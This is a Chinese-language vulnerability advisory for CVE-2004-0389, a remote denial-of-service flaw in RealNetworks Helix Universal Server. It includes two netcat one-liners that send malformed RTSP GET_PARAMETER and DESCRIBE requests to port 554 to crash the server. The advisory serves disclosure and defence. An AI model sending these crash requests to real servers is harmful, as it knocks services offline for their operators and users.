Real Networks Helix Universal Server远程拒绝服务漏洞

漏洞信息详情

Real Networks Helix Universal Server远程拒绝服务漏洞

• CNNVD编号：CNNVD-200406-023
• 危害等级： 高危
  
  
• CVE编号：
  CVE-2004-0389
  
• 漏洞类型：
  
  
  其他
  
• 发布时间：
  
  2004-04-15
  
• 威胁类型：
  
  
  远程
  
• 更新时间：
  
  2006-01-05
  
• 厂        商：
  
  realnetworks
• 漏洞来源：
  iDEFENSE

Helix Universal Server是一款由RealNetWorks开发和维护的多类型媒体服务器。
Helix Universal Server不正确处理畸形RTSP请求，远程攻击者可以利用这个漏洞对服务器进行拒绝服务攻击。
问题是Helix Universal Server不正确处理特殊构建的GET请求，下面的请求可导致NULL指针废弃而引起应用程序崩溃：
$ echo -e \”GET_PARAMETER / RTSP/1.0＼n＼n\” | nc -v localhost 554
$ echo -e \”DESCRIBE / RTSP/1.0＼nSession：＼n＼n\” | nc -v localhost 554
如果服务器以特殊选项如\’\’–no-crash-avoidance\’\’或\’\’–no-auto-restart\’\’启动，服务器就会变的不可访问。

厂商补丁：
Real Networks
————-
目前厂商还没有提供补丁或者升级程序，我们建议使用此软件的用户随时关注厂商的主页以获取最新版本：

http://www.real.com” target=”_blank”>
http://www.real.com

来源: IDEFENSE
名称: 20040415 RealNetworks Helix Universal Server Denial of Service Vulnerability
链接:http://www.idefense.com/application/poi/display?id=102&type=vulnerabilities

来源: XF
名称: helix-get-dos(15880)
链接:http://xforce.iss.net/xforce/xfdb/15880

来源: BID
名称: 10157
链接:http://www.securityfocus.com/bid/10157

来源: IDEFENSE
名称: 20040415 RealNetworks Helix Universal Server Denial of Service Vulnerability
链接:http://www.idefense.com/application/poi/display?id=102&type=vulnerabilities

来源: SECUNIA
名称: 11395
链接:http://secunia.com/advisories/11395